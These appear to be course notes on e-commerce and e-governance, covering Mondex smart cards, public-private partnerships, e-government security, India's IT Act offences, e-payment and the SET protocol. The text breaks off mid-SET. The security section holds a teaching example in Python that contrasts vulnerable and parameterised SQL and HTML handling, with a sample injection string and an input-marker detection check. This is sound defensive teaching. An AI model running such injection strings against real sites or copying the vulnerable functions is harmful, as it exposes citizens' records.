Protect against a full range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card (figure not reproduced in this text)

Smart card processing (figure not reproduced in this text)

Smart Card Applications -

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

E-cash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks, etc.

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies

ADVANTAGES

CONSUMER -

Convenience

Accessibility

On-chip record of recent transactions

Home load

Internet purchases

MERCHANT -

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected:

o Limits for collecting personal information

o Limits for using, disclosing and keeping personal information

o Keeping personal information accurate

o Safeguarding personal information

Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 - two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available - government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are often treated as the same; however, there is some difference between the two.

E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, as a definition congruent with e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

(architecture diagram not reproduced in this text)

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community - providers of goods and services - to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and to create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

Generally, but not always, involving:

o Long Term Contracts

o User Charges and/or Payments flowing between the Parties

o Shared Investments, but Mainly Private

o Risk Sharing by the Parties

Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

Fiscal Head Room

As a Way of Financing the Project

Separate Policy & Regulation from Operations

Make the Good or Service Available

Pay for Performance and Output

Introduce Competition - For and In the Market

The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?

Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source / RFP / Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract: Risks and Rewards

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures, by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization: the capability to give access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent the person or system intervening in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been fully addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.

Continually improve its control environment.

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
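The two vulnerability classes named above, shown side by side with their fixes in an added example (not code from the cited study): a citizen-lookup form handled with a string-built query and unescaped output, then with a parameterised query and HTML escaping, plus a simple log-side signal for noticing attempts. The table, rows and field names are constructed.

```python
"""Vulnerable and hardened handling of a citizen-lookup form (constructed example)."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows standing in for a citizen register."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE citizens (id INTEGER, name TEXT, tax_id TEXT)")
    con.executemany("INSERT INTO citizens VALUES (?, ?, ?)",
                    [(1, "Asha", "TAX-001"), (2, "Ravi", "TAX-002")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, name: str) -> list:
    """The request parameter is pasted into the SQL text, so it can change
    the query's logic (SQL injection) and expose or alter other rows."""
    query = f"SELECT id, name, tax_id FROM citizens WHERE name = '{name}'"
    return con.execute(query).fetchall()


def lookup_safe(con: sqlite3.Connection, name: str) -> list:
    """Parameterised query: the driver passes the value separately from the
    SQL text, so it is only ever compared, never parsed as SQL."""
    return con.execute("SELECT id, name, tax_id FROM citizens WHERE name = ?",
                       (name,)).fetchall()


def render_vulnerable(name: str, rows: list) -> str:
    """Echoes the parameter into HTML unescaped: reflected XSS."""
    return f"<h1>Results for {name}</h1><p>{len(rows)} record(s)</p>"


def render_safe(name: str, rows: list) -> str:
    """Context-appropriate output encoding for HTML body text."""
    return f"<h1>Results for {html.escape(name)}</h1><p>{len(rows)} record(s)</p>"


def suspicious_input(value: str) -> bool:
    """Cheap log-side signal for a WAF or SIEM rule: quotes, tags or comment
    markers in a field that should only contain a name.  Not a substitute
    for the fixes above, only a way to notice attempts in the access log."""
    return any(marker in value for marker in ("'", "<", ">", "--", ";"))


if __name__ == "__main__":
    con = make_db()
    probe = "x' OR '1'='1"          # constructed injection string
    print(lookup_vulnerable(con, probe))   # every row comes back
    print(lookup_safe(con, probe))         # nothing matches that literal name
    print(render_safe("<b>Asha</b>", lookup_safe(con, "Asha")))
```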

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms, Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 Million Internet Users
• 65 Million Active Internet Users, up by 28% from 51 million in 2010
• 50 Million users shop online on Ecommerce and Online Shopping Sites
• 46+ Million Social Network Users
• 346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• Secures access
• Downloads, copies or extracts any data, computer database or any information
• Introduces or causes to be introduced any virus or contaminant
• Disrupts or causes disruption
• Denies or causes denial of access to any person
• Provides any assistance to any person to facilitate access
• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences -

Section | Offence | Punishment
65 | Tampering with computer source documents - Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


GROWTH IN e-PAYMENT SYSTEM

REGULATION -

• The Reserve Bank of India (RBI) has been supportive in the development of electronic payments.
• In this direction, the "Payments and Settlement System Act" was enacted.
• Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT -

• Indian banks have put various channels of electronic payments in place to encourage customers to adopt the electronic mode.
• Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels apart from bank branches.

MARKET MAPPING -

• The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian Payment System Is Transforming From Paper Mode To Electronic Mode

Two main reasons for such a shift are:

1. The regulator has mandated routing all high-value transactions electronically to minimize movement of money and risk.
2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)
• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

• Credit cards
• Debit cards
• ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. It is subject to the US economic sanction list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features, such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.
• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.
• Electronic payments are fully traceable.
• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.
• Most banks offer same-day value for payments made to other accounts held in that same bank.
• Many banks offer same-day money transfer inter-bank services for large value payments.
• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.


Features of Payment Methods

• Anonymity: whether the payment method is anonymous
• Security: whether the payment method is secure
• Overhead cost: the overhead cost of processing a payment
• Transferability: whether a payment can be carried out without the involvement of a third party
• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment
• Acceptability: whether the payment method is supported globally

4C PAYMENTS METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash
• Credit card
• Check
• Credit/debit (Fund Transfer)

• A payment method should be:
  - Very secure
  - Having low overhead cost
  - Transferable
  - Acceptable anywhere
  - Divisible
  - Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.
• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the internet.

Disadvantage of SSL

• It is not a complete credit card payment method.
• For example, it cannot support on-line credit card authorization.

SET was specially developed to provide secure credit card payment over the internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:
  - Confidentiality - Sensitive messages are encrypted so that they are kept confidential
  - Integrity - Nearly all messages are digitally signed to ensure content integrity
  - Authentication - Authentication is performed through a public key infrastructure

SET network architecture

• Merchant: a seller, which is connected to an acquirer
• Cardholder: a registered holder of the credit card, who is a buyer
• Issuer: the bank that issues the credit card to a cardholder
• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers
• A merchant can process various credit cards through a single acquirer
• Payment Gateway: This is typically connected to the acquirer
  - The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment

SET Digital Certificate System


Dual signature generation and verification -

• In the physical credit card system:
  - the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential
  - data integrity can basically be ensured by using printed receipts
  - cardholder's authentication relies on simple signature checking only
• In an electronic credit card system:
  - the Order Information (OI) and PI can be digitally signed to ensure data integrity
  - the sensitive credit card information may still be disclosed to other people
• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.
• The dual signature can be verified as follows:

Step 1: The merchant first finds H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign(cardholder) ]

